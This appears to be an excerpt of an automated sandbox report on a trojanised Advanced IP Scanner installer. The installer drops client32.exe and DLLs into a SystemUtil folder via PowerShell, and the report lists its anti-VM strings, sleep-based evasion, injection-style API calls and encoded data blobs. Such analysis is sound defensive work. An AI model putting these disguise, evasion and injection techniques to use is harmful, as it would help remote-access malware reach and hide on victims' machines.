                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-HA61E.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-5JUJC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-5C3J6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-BPHN2.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\printsupport\is-F8M60.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-TE3AT.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-ET38G.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-UCVS8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-L3ANO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\platforms\is-1PGBC.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-AQQBN.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-MR0EO.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-JOPC8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-14FKM.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-2D48T.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-P2PON.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\libeay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-0LL3Q.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-495HA.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-DMJVK.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-IK3SG.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-DLE8L.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-593G3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-5KHP2.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-FLT6F.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-V71S3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-DORH9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-QVRL0.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-9GMK5.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-RT7U6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeEvaded block: after key decisiongraph_7-96998
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeEvaded block: after key decisiongraph_7-99906
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeEvaded block: after key decisiongraph_7-99998
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeEvaded block: after key decisiongraph_7-100186
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeEvaded block: after key decisiongraph_7-100234
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-96940
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeAPI coverage: 5.7 %
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeAPI coverage: 2.8 %
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685A4F307_2_685A4F30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2044Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe TID: 3300Thread sleep time: -819750s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe TID: 7012Thread sleep time: -42800s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe TID: 3300Thread sleep time: -1244750s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_685A3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 685A3226h7_2_685A3130
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,7_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,7_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_6882CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,7_2_6882CA9B
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_68830B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_68830B33
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,8_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,8_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,8_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,8_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,8_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,8_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 8_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,8_2_11064E30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: VMware
                                  Source: client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla]h*
                                  Source: powershell.exe, 00000003.00000002.1945029113.0000000006FB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: client32.exe, 00000008.00000003.2034068400.00000000004FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                                  Source: KC0uZWwr8p.tmp, 00000001.00000003.1994862774.0000000001467000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}og>K
                                  Source: unins000.dat.1.drBinary or memory string: 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
                                  Source: unins000.dat.1.drBinary or memory string: pGKVKQiFalIRSpS+b8h4yXu7f4F173oPnaJfdf6CO9BL0uO4v6liPWIbSKdwD5fPibLHAxNx+l4ebh4B373rfYPaIXOaJ2x332r6ezlxRLYyFCPwPH+PgKXgAAWIqPnEjjOxznIy0Xf0dvZy2U4Ywm0zzTQ0T8wyHe0t6vPcKZAe3R8Jk9GlbEe3qg0ZqSJ4UhxlFKRilSkIhWpSEUqUpGKVKQiFalIRULk+LMAcEI+Ux6Xi3GpgstIXNLfwPfjsgUur/H/w0uKIqO7BV7ifrqHQEGGzaR41HFJ/6f/AZdyuBwvI4zXHZf1GP/L+EwFXK7EpSIut8qUjlf4H/zjZex/hgncK2M/2VFQzn5V2TLiRwO6yjJW1v4fytmvX85+y3L2u5ezP7Sc/XPL2b+ynP2R5ezfWc7+4+Xsv1bO/gzcv3IUlpPELSH79TBdleJt9wm4rVC8reqA++SKt0OdMbxCcQTrvWRYZKfi4/pLcVviuQUvN8qwuYoS4WNlmHvd4m2FFBnmJGHpPXSenyS23RNl2Po6Ejt0GFsquS2SIcNCJ3upB7v4B3j4eA/V6KvZR0PdxVvg4+zh7TZUw9xsVK8fNNQDAh29nR29fLxdhmqEuQRoDNNSVhriGBDgMtnJK0wdI/AOGKoR5O89KEDg7jLZMaDXZA+Bv0+Aj2tgL4HP5EGOAZM1g/tqqE929PZwdQkInCCZmmRUo51dvAM9AsOUldRRio3qo8k/GsL9vsJTYz7+w/0F7h6BLoLAIH80zPKHASIFb8fJuG3oEmga5Ovr4x+oLjzVpq7j4+3q4Rbk7xjo4y9SDQzzRdUQD+/vvsU9vckYZ5cAgb+HbyAmrSURxzhHb0c3F391E5fJPoEuFFegv4+X5pDekvoU6ZBA/6CAQDovV8GS+VZDS2jMkAAXQZA/5l+0jXv8XfyCsMRcnMf7ewR7eLm4uQQUHZQ8PDIUg5IJY12CXbzUveh3qIZjwGjvYB9PF38N9d7FcfYuP9IhvUuYMKR3UV6EJePr4o0UCcQGFu0JHC5iUNK4slkVS8mSlzwipG+cuKA0LTy8nX1CAjTp/KaPdy9RyQeUClXkLQNKOItYvug0RYpBTl4egjEuYWZYcBRd/4H9nQb069uvn0Dg2tfZtZS6l6O3WxA6xlCN7hJHeheVZ1klVLxXINx0LD6mrCSsl11Z8SNKZERPZZnJypOZwoMzZwoX9KFd+LN/P/ZaDPiXHnDDF/ShXfgTEhISqIsSMuPXkALdRbScAXwZsmjRT8KlUYERLucW6BfMwOWin3QX0X4I1DUCXL4N1NWn5a8YDy5DKT7UF8f7hSWrplA50Wn1ibycRA2wRLvJOz5Rszto0CCmpaXFbPX7M0fDgczZeAhzNx/G+g7UZgO0RjKtYdpsmPZwNmiEARs+fDjT0R3JRo4cyUbojWF6+qPZmDFj2HC98Ux3jAnTG2/BjMYbszGmNszQ0p6ZmpoyK0sLZmFpxWxsbJjHhBFsstVI5mutx/zsDFig4zgWLBjPpriash89JrAZnpbM1EbALCa6MYeJjrh0ZzYCD+bo6MicBM5M4OrGXFxc2KRJk5ibTxALCAhgawcz9rdZA7YBS22jPmNbRiPGMbZ5jByLMpRl4caMhZvIsQgzORaJ63EmjEWZybI4c+xbTFHHXI7FW9ZhMZbyLN5Knm0wVcQwSmyDmSKLmKDAIswboJ4C